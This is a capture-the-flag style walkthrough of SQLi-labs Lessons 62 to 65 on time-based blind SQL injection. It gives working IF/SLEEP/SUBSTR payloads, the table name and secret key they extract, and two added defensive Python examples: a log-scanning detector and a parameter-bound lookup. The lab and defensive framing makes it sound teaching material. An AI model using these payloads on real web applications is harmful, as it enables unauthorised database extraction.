Blind-based (time delay). Use the ascii() function to make the result more accurate, since a plain string comparison such as >'o' is case-insensitive under MySQL's default collation (the table name is case sensitive, the secret key is not).

SQLi-labs: Lesson 62

UNION SELECT does not work. Let's try time-delayed injection.

See Lesson 15 and Lesson 46 for details.

  • ?id=1') and If(ascii(substr(database(),1,1))=116,0,sleep(5))--+
  • ?id=1') and If(substr(database(),1,8)='security',0,sleep(5))--+
  • ?id=1') or if ((select substr((select version()),1,1))=5,sleep(2),null)--+

SQLi-labs: Lesson 63

  1. Get table name

    First, get the length of the table name (number of characters):

    ?id=1' and if(substr((select char_length(concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c))),1,1)='1', sleep(3),null)--+

    After several attempts we get the number 12. Since we added two custom characters (0x5c, a backslash on each side), the table name actually contains 10 characters.

    Then we can use the following query to narrow down the scope:

    • ?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)>'o', sleep(3),null)--+
    • ?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),2,1)>'m', sleep(3),null)--+

    After several attempts, we get the table name: QPI3LTNI2S

    Sometimes you don't need the table name at all to get the column name: when the schema holds a single table, the group_concat subquery returns exactly that name, so it can be used directly. Try the following query in your database:

    select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select group_concat(table_name) from information_schema.tables where table_schema=database());

  2. Get the column name (same method as above)

  3. Get the secret key (same method as above)

    • ?id=1' and if(substr((select char_length(concat(0x5c, (select secret_B71M from QPI3LTNI2S),0x5c))),1,1)='2', sleep(3),null)--+
    • ?id=1' and if(substr((select char_length(concat(0x5c, (select secret_B71M from QPI3LTNI2S),0x5c))),2,1)='6', sleep(3),null)--+

    So the secret key has 26 - 2 = 24 characters.

    • ?id=1' and if(substr((select secret_B71M from QPI3LTNI2S),1,1)='5',sleep(3),null)--+
    • ?id=1' and if(substr((select secret_B71M from QPI3LTNI2S),2,1)='B',sleep(3),null)--+

    Finally, we have the secret key: 5BXNSLRW7XHHDYLP0NFFCZNZ
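    The requests above leave a very recognisable trail in the web server log: a conditional IF(), a SLEEP() call, SUBSTR/ASCII character probing, and an information_schema lookup, repeated many times from one client. The following detector is an added example written for this page, not part of SQLi-labs; it scans constructed Apache-style log lines (the IP addresses, timestamps and paths are made up) for the payload shapes used in Lessons 62 to 65, including the `))` and `")` closing variants, and reports per client how many probes were seen and how much delay they would have induced.

```python
"""Flag time-based blind SQL injection probes in web access logs (added example)."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log lines in Apache combined format (trimmed).
# Addresses, timestamps and paths are invented for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-63/?id=1 HTTP/1.1" 200 732
203.0.113.7 - - [01/Jan/2024:10:00:04 +0000] "GET /Less-63/?id=1'+and+if(substr((select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),1,1)>'o',+sleep(3),null)--+ HTTP/1.1" 200 732
203.0.113.7 - - [01/Jan/2024:10:00:08 +0000] "GET /Less-64/?id=1))+and+if(ascii(substr((select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),1,1))>ascii('x'),+sleep(3),null)--+ HTTP/1.1" 200 732
198.51.100.2 - - [01/Jan/2024:10:00:09 +0000] "GET /Less-62/?id=2 HTTP/1.1" 200 731
203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /Less-65/?id=1%22)+and+if(ascii(substr(database(),1,1))=116,0,sleep(5))--+ HTTP/1.1" 200 732
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Each indicator is matched against the URL-decoded, lower-cased query string.
INDICATORS = {
    # a delay that only fires when a condition holds: the core of the technique
    "conditional_delay": re.compile(r"\bif\s*\(.*\b(sleep|benchmark)\s*\(", re.S),
    "sleep_call": re.compile(r"\bsleep\s*\(\s*(\d+)"),
    # character-at-a-time extraction primitives
    "char_probe": re.compile(r"\b(substr|substring|mid|ascii|ord)\s*\("),
    "schema_walk": re.compile(r"information_schema\.|\bdatabase\s*\(\s*\)|\bversion\s*\(\s*\)"),
    "comment_terminator": re.compile(r"--(\s|$)|#|/\*"),
}


def decode_query(path):
    """Return the decoded query string of a request path ('' if there is none)."""
    _, _, query = path.partition("?")
    return unquote_plus(query)  # '+' becomes a space, %xx escapes are decoded


def classify(query):
    """Return the names of all indicators that match the decoded query."""
    q = query.lower()
    return {name for name, rx in INDICATORS.items() if rx.search(q)}


def sleep_seconds(query):
    """Seconds the request would stall the worker if the condition is true."""
    m = INDICATORS["sleep_call"].search(query.lower())
    return int(m.group(1)) if m else 0


def is_time_based_probe(hits):
    """A probe pairs a delay with either a condition or an extraction primitive."""
    return "conditional_delay" in hits or ("sleep_call" in hits and "char_probe" in hits)


def scan_line(line):
    """Return a finding dict for one log line, or None if it is not a probe."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = decode_query(m.group("path"))
    hits = classify(query)
    if not is_time_based_probe(hits):
        return None
    return {
        "ip": m.group("ip"),
        "path": m.group("path").split("?")[0],
        "indicators": sorted(hits),
        "delay": sleep_seconds(query),
    }


def analyze(log_text):
    """Aggregate probe findings per client IP: count, induced delay, targeted paths."""
    summary = defaultdict(lambda: {"probes": 0, "stall_seconds": 0, "targets": set()})
    for line in log_text.splitlines():
        finding = scan_line(line)
        if finding:
            s = summary[finding["ip"]]
            s["probes"] += 1
            s["stall_seconds"] += finding["delay"]
            s["targets"].add(finding["path"])
    return dict(summary)


if __name__ == "__main__":
    for ip, s in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {s['probes']} probes, up to {s['stall_seconds']}s induced delay, "
              f"targets {sorted(s['targets'])}")
```

    On the constructed sample, 203.0.113.7 is reported with three probes, 11 seconds of potential delay and three targeted paths, while the plain `?id=2` request from the other client is ignored. In practice the per-client count and the response-time column of the log are the strongest signals, because a single probe extracts only one bit and real extraction needs hundreds of them.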


SQLi-labs: Lesson 64

Source code: $sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";

Queries are similar:

?id=1)) and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>ascii('x'), sleep(3),null)--+


SQLi-labs: Lesson 65

Source code:

$id = '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

Queries are similar:

?id=1") and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=ascii('X'), sleep(3),null)--+
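The root cause in Lessons 64 and 65 is visible in the two source lines quoted above: $id is spliced into the statement text, so the quotes and parentheses in the parameter become SQL. The following is an added example, not SQLi-labs code, showing the same lookup against an in-memory SQLite table (the users are constructed): one function mirrors the lab's concatenation purely to make the rewritten statement visible, the hardened version allow-lists the id as a decimal integer and binds it as a parameter, and a third shows that even an unvalidated bound parameter is compared as data rather than parsed.

```python
"""Hardened counterpart to the SQLi-labs user lookup (added example)."""
import sqlite3

# Constructed sample rows standing in for security.users
SAMPLE_USERS = [(1, "alice"), (2, "bob"), (3, "carol")]

# The Lesson 65 payload from this page, used here only as an input value
PAYLOAD = '1") and if(ascii(substr(database(),1,1))=116,0,sleep(5))--+'


def open_db():
    """Create the in-memory table used by the examples below."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_query_unsafe(raw_id):
    """Mirror of the lab's concatenation (Lesson 65 wraps $id in double quotes).

    Returned as a string and never executed: it only shows how the input
    closes the quote and parenthesis and appends its own clauses."""
    quoted = '"' + raw_id + '"'
    return f"SELECT * FROM users WHERE id=({quoted}) LIMIT 0,1"


def parse_id(raw_id):
    """Allow-list the parameter: an id must be a plain non-negative decimal."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError(f"invalid id parameter: {raw_id!r}")
    return int(raw_id)


def lookup_user(conn, raw_id):
    """Safe lookup: validated integer, bound as a parameter, never spliced into SQL."""
    user_id = parse_id(raw_id)
    return conn.execute(
        "SELECT id, username FROM users WHERE id = ? LIMIT 1", (user_id,)
    ).fetchone()


def lookup_user_bound_only(conn, raw_id):
    """Binding alone: the whole payload is one string value, so it matches no id.

    Validation is still worth keeping, because it rejects the request early
    and gives a clean log line instead of a silent empty result."""
    return conn.execute(
        "SELECT id, username FROM users WHERE id = ? LIMIT 1", (raw_id,)
    ).fetchone()


if __name__ == "__main__":
    conn = open_db()
    print("concatenated statement:", build_query_unsafe(PAYLOAD))
    print("bound only:", lookup_user_bound_only(conn, PAYLOAD))
    try:
        lookup_user(conn, PAYLOAD)
    except ValueError as e:
        print("validated lookup rejected input:", e)
    print("validated lookup for id 2:", lookup_user(conn, "2"))
```

The printed concatenated statement begins `SELECT * FROM users WHERE id=("1") and if(`, which is exactly the shape the lesson exploits; the bound version returns no row for the same string, and the validated version refuses it before any query runs.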


Lessons 66-75: no source. The author didn't post them on his webpage.
